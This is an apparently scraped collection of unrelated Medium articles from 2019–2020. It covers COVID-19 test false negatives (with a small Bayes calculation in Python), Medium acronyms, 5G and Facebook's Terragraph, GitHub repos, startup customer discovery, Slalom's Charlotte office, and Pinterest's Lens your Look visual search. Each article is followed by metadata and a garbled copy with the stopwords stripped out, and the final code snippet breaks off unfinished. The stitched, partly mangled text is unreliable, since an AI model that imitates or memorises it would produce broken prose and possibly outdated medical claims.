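# Illustrative Bayes calculation for a symptomatic, exposed patient (assumed numbers).
sensitivity = 0.70    # assumed: swab sampling misses roughly 30% of true infections
specificity = 0.99    # assumed: false positives are rare
pretest_prob = 0.50   # assumed: symptomatic patient with likely exposure

p_pos = sensitivity * pretest_prob + (1 - specificity) * (1 - pretest_prob)
p_neg = 1 - p_pos

# Chance the patient is infected despite a NEGATIVE result (false reassurance).
p_infected_given_neg = (1 - sensitivity) * pretest_prob / p_neg
# Chance the patient is infected given a POSITIVE result.
p_infected_given_pos = sensitivity * pretest_prob / p_pos

print(f"P(infected | negative test) = {p_infected_given_neg:.0%}")   # ~23%
print(f"P(infected | positive test) = {p_infected_given_pos:.0%}")   # ~99%

With these assumed numbers, a negative swab still leaves roughly a one-in-four chance of infection, which is exactly why the clinicians quoted here advise symptomatic patients to self-quarantine regardless of the result.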
Several doctors have said the long swabs inserted deep into a patient’s nose could miss the virus if the patient is not showing many symptoms at the time of the test. Dr. Paul Pottinger, an infectious disease physician at UW Medical Center, explains, “The one caveat like we talked about before, if you go in to get tested too early — for example if you have no symptoms at all — then the test may not work very well. It’s really designed and validated for people who are having symptoms of infection when they have the test.” According to Dr. Lee Harold Hilborne, a professor of pathology and laboratory medicine at UCLA, the high rate of false negatives may be due to improper sample collection rather than inaccurate analytical laboratory techniques. Hilborne elaborates, “The majority of issues contributing to error in diagnostic testing are pre-analytic. These occur during specimen order, collection, and transport, before the specimen ever reaches the lab. We know that collection methods do not always pick up the virus. Studies suggest current swab collection may have sensitivity in the range of 60 to 75 percent. That means the specimen submitted to the laboratory from a patient with the infection will not contain the virus roughly 25 to 40 percent of the time.” RT-PCR test kit to detect presence of 2019-nCoV in clinical specimens (Photo by tilialucida) To address the risks associated with false-negative test results, Dr. Sampathkumar and colleagues outlined four evidence-based recommendations: Continued strict adherence to physical distancing, hand-washing, surface disinfection, masking and other preventive measures, regardless of risk level, symptoms or COVID-19 test results, must be emphasized. Development of highly sensitive and specific tests, including improved RT-PCR tests and serological assays to detect antibodies, is needed to minimize the incidence of false-negative results and the risk of ongoing transmission based on a false sense of security. Risk levels should be assessed prior to testing. Negative test results should be interpreted with caution, especially for individuals in higher-risk groups, such as healthcare workers. Risk-stratified protocols must be put in place in order to properly interpret negative test results. These protocols should employ statistical data on diagnostics, transmission, and outcomes. “For truly low-risk individuals, negative test results may be sufficiently reassuring,” says Colin West, M.D., Ph.D., a Mayo Clinic physician and the study’s first author. “For higher-risk individuals, even those without symptoms, the risk of false-negative test results requires additional measures to protect against the spread of disease, such as extended self-isolation.” 2019-nCoV IgM/IgG antibodies diagnostic laboratory test (Image by science photo) What about blood tests to detect antibodies, the body’s response to the virus? These tests have limited utility from a diagnostic standpoint, as the body may not have had enough time to produce detectable antibodies in the early stages of infection, leading to false negative results. However, serological testing may be used to detect previous exposure, evaluate community spread, and assess antibody titers. But for now, testing results are fraught with uncertainty. While individuals who recover from viral infections usually emerge with some degree of immunity, it is not yet known to what extent and for how long immunity to COVID-19 may last.
Researchers are still unclear as to whether the presence of antibodies necessarily confers immunity to the novel coronavirus. Higher levels of antibodies generally indicate the mounting of a stronger immune response, but the level of antibodies needed for COVID-19 immunity has not yet been established. The reliability of antibody testing is another point of contention adding to the confusion. In Laredo, Texas, a purchase of 20,000 rapid COVID-19 tests was recently seized by the federal government after local health department officials discovered the tests were only accurate about 20 percent of the time. Generally, antibody tests that utilize a technique known as ELISA (enzyme-linked immunosorbent assay) tend to outperform point-of-care (POC) lateral flow tests in terms of both sensitivity and specificity.
https://medium.com/medical-myths-and-models/how-accurate-and-reliable-is-covid-19-testing-41cbc97c1d47
['Nita Jain']
2020-09-30 01:41:53.451000+00:00
['Health', 'Education', 'Science', 'Ideas', 'Covid 19']
Title Accurate Reliable COVID19 TestingContent COVID19 MEDICINE HEALTH Accurate Reliable COVID19 Testing PCRbased nasal swab testing serological antibody testing certain limitation state health department private enterprise continue ramp testing capacity COVID19 several health expert warn test result 100 percent accurate interpreted context clinical presentation exposure risk commonly used PCRbased nasal swab test detect SARSCoV2 highly specific sensitive meaning positive result useful negative result word positive result almost guarantee infection novel coronavirus negative result cannot rule presence infection “The issue test SARSCoV2 virus time test rigorously deploying field” say Dr Gary L LeRoy president American Academy Family Physicians “Most polymerase chain reaction PCR antibody test year laboratory testing used don’t kind time major concern false negative someone test negative thinking infected could unknowingly spread virus community” Healthcare worker administers nasal swab test COVID19 drivethru facility Photo Zstock article published Mayo Clinic Proceedings draw attention risk posed overreliance COVID19 testing make public health decision Priya Sampathkumar MD infectious disease specialist Mayo Clinic study coauthor writes healthcare official anticipate “less visible second wave infection people falsenegative test results” Based preliminary evidence China quantitative reverse transcription polymerase chain reaction qRTPCR COVID19 testing nasal swab sample may produce false negative 30 time testing conducted 0–7 day illness onset 15 day illness chance receiving false negative result shoot 50 false negative figure may even higher US according Harlan Krumholz MD professor medicine Yale opinion piece New York Times Dr Krumholz expounds “There many reason test would falsely negative reallife condition Perhaps sampling inadequate common technique requires collection nasal secretion far back nose — rotating swab several time easy procedure perform patient tolerate possible cause false negative result related laboratory technique substance used tests…If likely exposure symptom suggest Covid19 infection probably — even test negative” Nasal swab sample COVID19 test laboratory Photo Robert Kneschke Dr Alain Chaoui head Congenial Healthcare practice 50000 patient across five location Massachusetts told Boston Globe “A lot patient symptom clinically think COVID19 testing negative” Chaoui nonetheless advising patient test negative virus assume infected selfquarantine symptomfree least 72 hour Michelle Taylor tested negative COVID19 twice despite presenting concerning symptom including loss taste smell Several doctor said long swab inserted deep patient’s nose could miss virus patient showing many symptom time test Dr Paul Pottinger infectious disease physician UW Medical Centerm explains “The one caveat like talked go get tested early — example symptom — test may work well It’s really designed validated people symptom infection test” According Dr Lee Harold Hilborne professor pathology laboratory medicine UCLA high rate false negative may due improper sample collection rather inaccurate analytical laboratory technique Hilborne elaborates “The majority issue contributing error diagnostic testing preanalytic occur specimen order collection transport specimen ever reach lab know collection method always pick virus Studies suggest current swab collection may sensitivity range 60 75 percent mean specimen submitted laboratory patient infection contain virus roughly 25 40 percent time” RTPCR test 
kit detect presence 2019nCoV clinical specimen Photo tilialucida address risk associated falsenegative test result Dr Sampathkumar colleague outlined four evidencebased recommendation Continued strict adherence physical distancing handwashing surface disinfection masking preventive measure regardless risk level symptom COVID19 test result must emphasized Development highly sensitive specific test including improved RTPCR test serological assay detect antibody needed minimize incidence falsenegative result risk ongoing transmission based false sense security Risk level assessed prior testing Negative test result interpreted caution especially individual higherrisk group healthcare worker Riskstratified protocol must put place order properly interpret negative test result protocol employ statistical data diagnostics transmission outcome “For truly lowrisk individual negative test result may sufficiently reassuring” say Colin West MD PhD Mayo Clinic physician study’s first author “For higherrisk individual even without symptom risk falsenegative test result requires additional measure protect spread disease extended selfisolation” 2019nCoV IgMIgG antibody diagnostic laboratory test Image science photo blood test detect antibody body’s response virus test limited utility diagnostic standpoint body may enough time produce detectable antibody early stage infection leading false negative result However serological testing may used detect previous exposure evaluate community spread ass antibody titer testing result fraught uncertainty individual recover viral infection usually emerge degree immunity yet known extent long immunity COVID19 may last Researchers still unclear whether presence antibody necessarily confers immunity novel coronavirus Higher level antibody generally indicates mounting stronger immune response level antibody needed COVID19 immunity yet established reliability antibody testing another point contention adding confusion Laredo Texas purchase 20000 rapid COVID19 test recently seized federal government local health department official discovered test accurate 20 percent time Generally antibody test utilize technique known ELISA enzymelinked immunosorbent assay tend outperform pointofcare POC lateral flow test term sensitivity specificityTags Health Education Science Ideas Covid 19
3,814
Let’s normalize these acronyms for a better Medium
Twitter has acronyms and so do Instagram and Facebook, where people use fff (follow for follow) or kfb (kindly follow back), and so on. Well, they’re lame, but social media acronyms and slang are never cool; still, they make things easier on social media. How about we try the same thing on Medium? I’ve seen lots of authors trying to reply to all responses, and it’s usually “thanks for reading.” How about we change that to TFR/tfr! Lots of readers love responding to stories they loved and enjoyed reading. How about we type ILT/ilt/lt! for “I loved this/loved this”? The point is, we could normalize acronyms on Medium and use them “when necessary.” Just a suggestion. What do you think?
https://medium.com/wreader/lets-normalize-these-slangs-for-a-better-medium-d0330f7a570a
['Winifred J. Akpobi']
2020-12-06 10:54:24.378000+00:00
['Short Form', 'Advice', 'Writing Tips', 'Creativity', 'Writing']
Title Let’s normalize acronym better MediumContent Twitter acronym Instagram Facebook people use ffffollow follow kfbkindly follow back Well they’re lame social medium acronym slang never cool still make thing easier social medium try thing Medium I’ve seen lot author trying reply response it’s usually “thanks reading” change TFRtfr Lots reader love responding story loved enjoyed reading type ILTiltlt “I loved thisloved this” point could normalize acronym Medium use “when necessary” suggestion thinkTags Short Form Advice Writing Tips Creativity Writing
3,815
How Will Cities Pay for 5G? Ask Facebook.
Photo by Jack Sloop on Unsplash 5G is coming. 5G is the fifth generation of wireless networks. It’s significantly faster than current 4G networks, but the reason that 5G is important is not just so we can all watch Tiger King over and over on our phone or scroll endlessly through Facebook. It’s going to be essential to handle the massive increase in global mobile traffic that is expected in the next few years. Some estimates suggest that there will be over 5 times the mobile traffic in 2024 that there is today. 5G will be required to support that traffic. But there’s another reason that 5G will be important: it will enable cities to be able to become Smart Cities. What are smart cities? Smart Cities are basically cities that use technology to make planning and service delivery more efficient. The idea is that if you have a bunch of data about how resources are used or the behavior of people in the city, you can create a better functioning, safer city. For example, you can imagine a city that uses information about traffic and congestion to make traffic light wait times more efficient. Or, smart garbage disposal sites that send a signal when they are full, making disposal services more efficient. Information about water usage, electricity usage, and how people move throughout a city can also be used to inform policies and projects. Barcelona is already using this kind of technology to tell citizens where there are open parking spaces. Stockholm, Amsterdam, and Copenhagen, also each have smart city projects under development. At its core, smart cities rely on data to help make more effective administrative decisions. This data comes from sensors throughout a city that are connected over the Internet. Which brings us back to 5G: these types of large scale city design changes are possible, but only if they are supported by a suitably fast wireless network. The current networks would not be able to support these Smart City projects on a broad scale — but 5G networks could. Cities are therefore trying to build or facilitate the infrastructure needed for 5G networks, not only because they will be necessary to make those cities competitive, attract businesses, and give users the ability to download movies in seconds, but also because it is necessary to support a Smart City vision. If 5G is so important, why is it taking so long to get? Because it’s expensive. 5G networks are much faster than 4G, but the frequencies are also much higher — they’re between 24 and 72 GHz on a 5G network. What that means is that the signals don’t reach very far and they are easily blocked by trees, buildings, and other landscape features. To have the same kind of coverage that is possible with 4G networks, there would have to be many more cell towers. For cities and wireless companies, that means building a lot more infrastructure and laying way more fiber optic cable. And this is really expensive. Enter Facebook. Facebook seems to be expanding into every area of tech life (including getting into the cyber currency business), so it may not come as a surprise to you that they have also been working several projects to improve internet access. Their solution to the 5G infrastructure problem is a project called Terragraph. The solution they propose is to attach small cells to existing buildings and infrastructures that connect networks wirelessly. The small cells can be placed between existing cell towers. They act as intermediaries, connecting the cell towers to users, and extending the reach of those towers. 
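Why is distance such a problem at these frequencies? The free-space path loss formula gives a rough sense of it. The sketch below compares an assumed 28 GHz millimeter-wave carrier with a 2.4 GHz signal at the same distance; the numbers are idealized free-space values and ignore the building and foliage blockage described above.

import math

# Free-space path loss in dB, with distance in km and frequency in GHz:
# FSPL = 20*log10(d_km) + 20*log10(f_GHz) + 92.45
def fspl_db(distance_km, freq_ghz):
    return 20 * math.log10(distance_km) + 20 * math.log10(freq_ghz) + 92.45

d = 0.5  # assumed 500 m between antenna and user
print(f"2.4 GHz: {fspl_db(d, 2.4):.1f} dB path loss")   # ~94 dB
print(f"28 GHz:  {fspl_db(d, 28.0):.1f} dB path loss")  # ~115 dB

Roughly 21 dB of extra loss before any obstruction means each high-frequency cell covers a far smaller area, which is why dense networks of small cells and last-mile relays like Terragraph matter so much.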
Over long distances, this small cell wireless technology might not work very well. But as a “last mile” step between existing cell infrastructure and users, it’s able to deliver very fast service. And since the small cells can deliver data and connectivity from the cell towers to users wirelessly, they eliminate the need to lay more fiber optic cable, significantly cutting the cost of infrastructure. Facebook is not the only player in this game. At least a few other companies are also beginning to prototype similar “last mile” small cell technologies. This may be a good thing — while this kind of infrastructure will be useful, there may be some legitimate privacy concerns about the company providing internet connectivity also having access to so much personal information about us through our online profiles. What does this all mean for us? 5G will be coming, one way or another. But with this new small cell technology, it may get to us a little quicker and with a much lower price tag attached. This is good news. Many Americans still don’t have access to broadband. The appearance of 5G will likely begin in the biggest cities, and may not be accessible to most Americans for many years. But the less expensive it is to build the infrastructure, the quicker people are likely to have access to it. Ultimately, 5G networks will mean much faster speeds and reduced latency for users who have access to it. For business, it may mean an improved ability to innovate. And for cities, it means the potential to begin to create smart systems that improve service delivery.
https://medium.com/social-science/how-will-cities-pay-for-5g-ask-facebook-a97db6f7b786
['Ramsay Lewis']
2020-05-02 21:17:52.646000+00:00
['Technology', 'Cities', 'Science', 'Internet of Things', 'Future']
Title Cities Pay 5G Ask FacebookContent Photo Jack Sloop Unsplash 5G coming 5G fifth generation wireless network It’s significantly faster current 4G network reason 5G important watch Tiger King phone scroll endlessly Facebook It’s going essential handle massive increase global mobile traffic expected next year estimate suggest 5 time mobile traffic 2024 today 5G required support traffic there’s another reason 5G important enable city able become Smart Cities smart city Smart Cities basically city use technology make planning service delivery efficient idea bunch data resource used behavior people city create better functioning safer city example imagine city us information traffic congestion make traffic light wait time efficient smart garbage disposal site send signal full making disposal service efficient Information water usage electricity usage people move throughout city also used inform policy project Barcelona already using kind technology tell citizen open parking space Stockholm Amsterdam Copenhagen also smart city project development core smart city rely data help make effective administrative decision data come sensor throughout city connected Internet brings u back 5G type large scale city design change possible supported suitably fast wireless network current network would able support Smart City project broad scale — 5G network could Cities therefore trying build facilitate infrastructure needed 5G network necessary make city competitive attract business give user ability download movie second also necessary support Smart City vision 5G important taking long get it’s expensive 5G network much faster 4G frequency also much higher — they’re 24 72 GHz 5G network mean signal don’t reach far easily blocked tree building landscape feature kind coverage possible 4G network would many cell tower city wireless company mean building lot infrastructure laying way fiber optic cable really expensive Enter Facebook Facebook seems expanding every area tech life including getting cyber currency business may come surprise also working several project improve internet access solution 5G infrastructure problem project called Terragraph solution propose attach small cell existing building infrastructure connect network wirelessly small cell placed existing cell tower act intermediary connecting cell tower user extending reach tower long distance small cell wireless technology might work well “last mile” step existing cell infrastructure user it’s able deliver fast service since small cell deliver data connectivity cell tower user wirelessly eliminate need lay fiber optic cable significantly cutting cost infrastructure Facebook player game least company also beginning prototype similar “last mile” small cell technology may good thing — kind infrastructure useful may legitimate privacy concern company providing internet connectivity also access much personal information u online profile mean u 5G coming one way another new small cell technology may get u little quicker much lower price tag attached good news Many Americans still don’t access broadband appearance 5G likely begin biggest city may accessible Americans many year le expensive build infrastructure quicker people likely access Ultimately 5G network mean much faster speed reduced latency user access business may mean improved ability innovate city mean potential begin create smart system improve service systemsTags Technology Cities Science Internet Things Future
3,816
9 Popular GitHub Repos For Every Web Developer
Realworld The first repository in this list is Realworld. Its creators call it nothing less than “The Mother of all Demo Apps.” A bold statement, for sure, but I don’t think it’s an exaggeration. Realworld is an exemplary Medium.com clone (yes, the very platform you are probably surfing right now!). But not only that. The repository lets you choose between different front-end and back-end implementations, which you can happily mix. Vue.js + Node/Express or React/Redux + Rust? They got it! Realworld shows you how the exact same blog app is built on almost any popular language or framework. How awesome is that?
https://medium.com/better-programming/9-popular-github-repos-for-every-web-developer-6826582291bc
['Simon Holdorf']
2020-02-19 18:28:48.177000+00:00
['Technology', 'Programming', 'Productivity', 'Creativity', 'JavaScript']
Title 9 Popular GitHub Repos Every Web DeveloperContent Realworld first repository list Realworld creator call nothing le “The Mother Demo Apps” bold statement sure don’t think it’s exaggeration Realworld exemplary Mediumcom clone yes platform probably surfing right repository let choose different front end back end implementation happily mix Vuejs NodeExpress React Redux Rust got Realworld show exact blog app built almost popular language framework awesome thatTags Technology Programming Productivity Creativity JavaScript
3,817
Why Your Startup Isn’t Getting the Right Customers
Why Your Startup Isn’t Getting the Right Customers And what it takes to actually sell your “dream customers” Photo by krakenimages on Unsplash “I was sure our product would be perfect for them,” the founder fumed as she dropped into the chair on the other side of my desk. She was building software to help automate hospital billing services — a notoriously complex industry — and she was coming from a meeting where she’d pitched her software to the billing management team at the enormous hospital system associated with my university. To her, this seemed like a “dream customer,” and she couldn’t understand why they weren’t interested. “So the meeting didn’t go well?” I joked. She rolled her eyes, clearly not in the mood for my usual sarcasm. “It went terribly,” she moaned. “It felt like they were basically trying to push me out the door as quickly as they could. They had no interest in what I was pitching.” “Why was that?” I asked. She threw open her arms. “How the heck am I supposed to know? They didn’t tell me anything.” “It’s not their job to tell you,” I reminded her. “But it’s your job to figure it out. Since they didn’t react to your pitch the way you expected, what does that tell you?” “That I’m a failure,” she huffed. “Well, I suppose you did fail,” I replied. “But that doesn’t make you a failure. It’s only a failure if you can’t learn something. In this case, you actually have some valuable new data.” “But they didn’t tell me anything,” she said. “They weren’t remotely interested.” “That, right there!” I exclaimed. “That’s important data. You met with a company you thought was your dream customer and they had no interest in what you were selling. Shouldn’t that tell you something?” “I guess,” she said. “I mean… I guess it tells me I was wrong about who my dream customer should be.” “And you don’t think that’s important data?” I asked. “Yeah… I guess so,” she sighed. “I know so,” I said, feeling like I was trying to drag out an important lesson from my four-year-old daughter rather than a 20-something. “So what’s the next question you should be asking yourself?” She thought for a few moments, then shook her head in frustration. “I have no idea. Why was I such an idiot?” “That’s a good place to start,” I said. She raised her eyebrows, so I quickly explained further: “Not that I’m calling you an idiot. But you clearly misunderstood something about this particular customer’s business. That’s a big deal. In order to figure out how to target the right customers, you need to figure out what you’ve misunderstood.” “And how do I do that?” she asked. “Empathy,” I answered. “It’s one of the most important skills for an entrepreneur to develop. You have to be able to put yourself in the shoes of your prospective customers and attempt to see the world from their perspective.”
https://medium.com/swlh/why-your-startup-isnt-getting-the-right-customers-9f6972fb1e98
['Aaron Dinin']
2020-10-31 18:41:41.859000+00:00
['Work', 'Sales', 'Business', 'Startup', 'Entrepreneurship']
Title Startup Isn’t Getting Right CustomersContent Startup Isn’t Getting Right Customers take actually sell “dream customers” Photo krakenimages Unsplash “I sure product would perfect them” founder fumed dropped chair side desk building software help automate hospital billing service — notoriously complex industry — coming meeting she’d pitched software billing management team enormous hospital system associated university seemed like “dream customer” couldn’t understand weren’t interested “So meeting didn’t go well” joked rolled eye clearly mood usual sarcasm “It went terribly” moaned “It felt like basically trying push door quickly could interest pitching” “Why that” asked Shew threw open arm “How heck supposed know didn’t tell anything” “It’s job tell you” reminded “But it’s job figure Since didn’t react pitch way expected tell you” “That I’m failure” huffed “Well suppose fail” replied “But doesn’t make failure It’s failure can’t learn something case actually valuable new data” “But didn’t tell anything” said “They weren’t remotely interested” “That right there” exclaimed “That’s important data met company thought dream customer interest selling Shouldn’t tell something” “I guess” said “I mean… guess tell wrong dream customer be” “And don’t think that’s important data” asked “Yeah… guess so” sighed “I know so” said feeling like trying drag important lesson fouryearold daughter rather 20something “So what’s next question asking yourself” thought moment shook head frustration “I idea idiot” “That’s good place start” said raised eyebrow quickly explained “Not I’m calling idiot clearly misunderstood something particular customer’s business That’s big deal order figure target right customer need figure you’ve misunderstood” “And that” asked “Empathy” answered “It’s one important skill entrepreneur develop able put shoe prospective customer attempt see world perspective”Tags Work Sales Business Startup Entrepreneurship
3,818
Charlotte — a New Technology Hub. Slalom Charlotte has now been around…
Slalom Charlotte has now been around for 1 year — traversing WeWork and our new home at the Railyard in Southend. We are about to have our launch party and I wanted to reflect on the last 6 months in Charlotte, after the last 7 years in San Francisco. It’s been a growth-fueled ride, with all the trappings you want to see in a market you’re invested in. I wanted to capture all the amazing things that have been happening but also set the stage for what we’re building: THE most impactful consulting firm in the Charlotte region. Folks that join our Charlotte market are going to grow to heights they didn’t think possible, and work on products and solutions that transform companies and industries here. I spent the last 7 years in San Francisco working with some of the most innovative companies on the planet. I’ve taken much of that learning to Charlotte, and I’m floored at the opportunity here. It’s an incredible time to be in Charlotte. It’s not only the abundance of BBQ or the myriad of breweries, but the passion and care the community has here. (There are a lot of breweries, wowza.) It’s an environment that you can grow and flourish in. My family and I have now been out here for 6 months, and it’s felt like a few days. I’m excited to share more on the great things happening in Charlotte and Slalom. So, what is happening in Charlotte? IT’S BANKING! Yes, and it’s actually more — it’s manufacturing, retail, healthcare, telecom, defense and also banking. :) I am amazed at the diversity of industry here, which allows us to really stand by the statement of diversity of work for our consultants, designers and engineers. There is not just diversity of industry, but diversity of work — modern application design, development, machine learning, IoT, cloud native architecture and transformation across [insert favorite buzzword]. A myriad of companies have announced technology hubs and new centers in Charlotte over the last few months. Why, you might ask? Talent to cross-train, attractive wages, lower housing costs than the top 5 major cities, good weather, proximity to top university areas, mountains and beaches. Here’s what I’ve noticed coming from one of the technology epicenters — you can do interesting, challenging, dynamic work in the field and it doesn’t solely have to be the Bay Area. I imagine that’s obvious to folks in other regions, but oftentimes the Silicon Valley influence can steer the conversation on tech work. There is no longer a requirement to be on the coast for technology adoption and high wages. The proliferation of services across the cloud vendors, and the availability of open source experts and education, has catapulted these supposed second cities into soon-to-be powerhouses. Charlotte on the verge — it will be a 3-year journey. I’ve spent a lot of time with technology and business leaders in Charlotte, across most industries, and I’ve learned that these leaders are starved for talent, adoption of new technologies, practices and evolution. Many of the companies here are getting underway with cloud technologies, but what is so attractive is that many are grabbing onto AI & ML use cases as a catalyst for adoption. That will result in both super interesting initial work and some complex enterprise work to set foundational cloud architecture and services. If you are a data scientist, designer or engineer, I would strongly consider the curve here. As I alluded to earlier, there are numerous companies announcing technology hubs, a new presence or a relocation to Charlotte in the last 6–12 months.
It’s encouraging, but also a sign of a soon-to-be challenging talent war. Not so dissimilar to what many large cities face today, but perhaps more pointed given the nature of industry and the frantic pace of new build-outs. By nature of industry, I mean many of the financial and manufacturing firms have a tremendous opportunity to modernize — in service of attaining new customers, delighting those customers and creating compelling products. We are training, and will continue to train, the uber-talented folks coming from these firms to grow into world-class technologists and leaders. An example of the tremendous growth in Charlotte is our Slalom office. I relocated mid-March and we had roughly 20 employees — today we sit north of 110 employees… A Call Out for Technologists. I have been asked a number of times by local leaders about my perception of the market, and while some of this is highlighted above, I always return with a question — who do you look up to in the technology space, who are your technology leaders? I have been getting a lot of blank stares. Let’s change this, together. Let’s attract and develop the technology leaders of tomorrow in Charlotte. If you aren’t in Charlotte yet, now is the time. You’re going to have diversity of industry, diversity of projects, diversity of thought and be a part of the rocket ship. Similar to getting asked about the technology scene in Charlotte, I get asked quite a bit about “Why Slalom” and frankly spend a lot of time talking with clients and recruits about “Why Slalom”. The rationale is fairly simple: we are a very different consulting firm than many — here you can advise and build, design and innovate, and be on the ground floor to transform our clients. It’s rare to be a part of a firm of our size and not be beholden to PowerPoint decks. (As much as I like a good set of slides.) The second and third reasons are that folks that join Slalom can have variety (you don’t get pigeon-holed), learn new technologies and patterns, and work with some profound & passionate experts. Our ability and desire to blend management consulting with technology, in a local market model with global services, is simply different. Charlotte is a great place to live now and will continue to grow into a powerhouse. If any of this piques your interest, I would love to chat. Originally posted on LinkedIn here.
https://medium.com/state-of-analytics/charlotte-a-new-technology-hub-50093c5befde
['Kyle Roemer']
2019-11-26 18:31:28.001000+00:00
['Charlotte', 'Analytics', 'Software Development', 'Startup', 'Cloud Computing']
Title Charlotte — New Technology Hub Slalom Charlotte around…Content Slalom Charlotte around 1 year — traversing WeWork new home Railyard Southend launch party wanted reflect last 6 month Charlotte post last 7 year San Francisco It’s growthfueled ride trapping want see market you’re invested wanted capture amazing thing happening also set stage we’re building impactful consulting firm Charlotte region Folks join Charlotte market going grow height didn’t think possible work product solution transform company industry spent last 7 year San Francisco working innovative company planet I’ve taken much learning Charlotte I’m floored opportunity It’s incredible time Charlotte It’s abundance BBQ myriad brewery passion care community lot brewery wowza It’s environment grow flourish family 6 month it’s felt like day I’m excited share great thing happening Charlotte Slalom happening Charlotte IT’S BANKING Yes it’s actually — it’s manufacturing retail healthcare telecom defense also banking amazed diversity industry allows u really stand statement diversity work consultant designer engineer diversity industry diversity work — modern application design development machine learning IoT cloud native architecture transformation across insert favorite buzzword myriad company announced technology hub new center Charlotte last month might ask Talent cross train attractive wage lower housing cost major 5 city good weather proximity top university area mountain beach Here’s I’ve noticed coming one technology epicenter — interesting challenging dynamic work field doesn’t solely Bay Area imagine that’s obvious folk region oftentimes Silicon Valley influence steer conversation tech work longer requirement coast technology adoption high wage proliferation service across cloud vendor availability open source expert education catapulted supposed second city soontobepowerhouses Charlotte verge — 3 year journey I’ve spent lot time technology business leader Charlotte across industry I’ve learned leader starved talent adoption new technology practice evolution Many company getting underway cloud technology attractive many grabbing onto AI ML use case catalyst adoption result super interesting initial work complex enterprise work set foundational cloud architecture service data scientist designer engineer would strongly consider curve alluded earlier numerous company announcing technology hub new presence relocation Charlotte last 6–12 month It’s encouraging also sign soon challenging talent war dissimilar many large city face today perhaps pointed given nature industry frantic pace new build out nature industry mean many financial manufacturing firm tremendous opportunity modernize — service attaining new customer delighting customer creating compelling product continue train uber talented folk coming firm grow world class technologist leader example tremendous growth Charlotte Slalom office relocated mid March roughly 20 employee — today sit north 110 employees… Call Technologists asked number time local leader perception market highlighted always return question — look technology space technology leader leader getting lot blank stare Let’s change together Let’s attract develop technology leader tomorrow Charlotte aren’t Charlotte yet time You’re going diversity industry diversity project diversity thought part rocket ship Similar getting asked technology scene Charlotte get asked quite bit “Why Slalom” frankly spend lot timing talking client recruit “Why Slalom” rationale fairly simple different consulting firm many 
— advise build design innovate ground floor transform client It’s rare part firm size beholden powerpoint deck much like good set slide second third reason folk join Slalom variety don’t get pigeonholed learn new technology pattern work profound passionate expert ability desire blend management consulting technology local market model global service simply different Charlotte great place live continue grow powerhouse peak interest would love chat Originally posted LinkedIn hereTags Charlotte Analytics Software Development Startup Cloud Computing
3,819
Building Lens your Look: Unifying text and camera search
Eric Kim | Pinterest engineer, Visual Search In February we launched Lens to help Pinners find recipes, style inspiration and products using the camera in our app to search. Since then, our team has been working on new ways of integrating Lens into Pinterest to improve discovery in areas Pinners love most–particularly fashion–with visual search. What we’ve learned is some searches are better served with text, and others with images. But for certain types of searches, it’s best to have both. That’s why we built Lens your Look, as an outfit discovery system that seamlessly combines text and camera search to make Pinterest your personal stylist. Launching today, Lens your Look enables you to snap a photo of an item in your wardrobe and add it to your text search to see outfit ideas inspired by that item. It’s an application of multi-modal search, where we integrate both text search and camera search to give Pinners a more personalized search experience. We use large-scale, object-centered visual search to provide us with a finer-grained understanding of the visual contents of each Pin. Read on to learn how we built the systems powering Lens your Look! Architecture: Multi-modal search Lens Your Look is built using two of Pinterest’s core systems: text search and visual search. By combining text search and visual search into a unified architecture, we can power unique search experiences like Lens your Look. The unified search architecture consists of two stages: candidate generation and visual reranking. Candidate generation In the Lens your Look experience, when we detect the user has done a text search in the fashion category, we give them the option to also take a photo of an article of clothing using Lens. Armed with both a text query and an image query, we leverage Pinterest Search to generate a high-quality set of candidate Pins. On the text side, we harness the latest and greatest of our Search infrastructure to generate a set of Pins matching the user’s original text search query. For instance, if the user searched for “fall outfits,” Lens your Look finds candidate results from our corpus of outfit Pins for the fall season. We also use visual cues from the Lens photo to assist with candidate generation. Our visual query understanding layer outputs useful information about the photo, such as visual objects, salient colors, semantic category, stylistic attributes and other metadata. By combining these visual signals with Pinterest’s text search infrastructure, we’re able to generate a diverse set of candidate Pins for the visual reranker. Visual reranking Next, we visually rerank the candidate Pins with respect to the query image, such as the Pinner’s article of clothing. The goal is to ensure the top returned result Pins include clothing that closely match the query image. Lens Your Look makes use of our visual object detection system, which allows us to visually rerank based on objects in the image, such as specific articles of clothing, rather than across the entire image. Reranking by visual objects gives us a more nuanced view into the visual contents of each Pin, and is a major component that allows Lens your Look to succeed. For more details on the visual reranking system see our paper recently published at the WWW 2017 conference. Multi-task training: Teaching fashion to our visual models Now that we have object-based candidates, we assign a visual similarity score to each candidate. 
Although we’ve written about transfer learning methods in the past, we needed a more fine-grained representation for Lens your Look. Specifically, our visual embeddings have to model certain stylistic attributes, such as color, pattern, texture and material. This allows our visual reranking system to return results on a more fine-grained level. For instance, red-striped shirts will only be matched with other red-striped shirts, not with blue-striped shirts or red plaid shirts. To accomplish this, we augmented our deep convolutional classification networks to simultaneously train on multiple tasks while maintaining a shared embedding layer. In addition to the typical classification or metric learning loss, we also incorporate task-specific losses, such as predicting fashion attributes and color. This teaches the network to recognize that a striped red shirt shouldn’t be treated the same as a solid navy shirt. Our preliminary results show that incorporating multiple training losses leads to an overall improvement in visual retrieval performance, and we’re excited to continue pushing this frontier. Conclusion Since launching our first visual search product in 2015, the visual search team has developed our infrastructure to support a variety of new features, from powering image search in the Samsung Galaxy S8 to today’s launch of Lens your Look. With one of the largest and most richly annotated image datasets around, we have an unending list of exciting ideas to expand and improve Pinterest visual search. If you’d like to help us build innovative visual search features, such as Lens your Look, join us! Acknowledgements: Lens your Look is a collaborative effort at Pinterest. We’d like to thank Yiming Jen, Kelei Xu, Cindy Zhang, Josh Beal, Andrew Zhai, Dmitry Kislyuk, Jeffrey Harris, Steven Ramkumar and Laksh Bhasin for the collaboration on this product, Trevor Darrell for his advisement and the rest of the visual search team.
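The post above doesn’t include code, but the reranking idea is easy to sketch. The snippet below is purely illustrative and not Pinterest’s production system (the function name, embedding dimensions, and random vectors are placeholders); it simply reorders a set of candidate Pins by cosine similarity between the embedding of the detected query object and each candidate’s embedding.

```python
import numpy as np

def rerank_by_visual_similarity(query_embedding, candidate_embeddings):
    """Reorder candidates (e.g. Pins from text retrieval) by cosine
    similarity to the query object's embedding, best match first."""
    q = query_embedding / np.linalg.norm(query_embedding)
    c = candidate_embeddings / np.linalg.norm(candidate_embeddings, axis=1, keepdims=True)
    scores = c @ q                 # one cosine-similarity score per candidate
    order = np.argsort(-scores)    # candidate indices, highest score first
    return order, scores[order]

# Toy example: 4 candidate Pins with 8-dimensional embeddings.
rng = np.random.default_rng(0)
query = rng.normal(size=8)
candidates = rng.normal(size=(4, 8))
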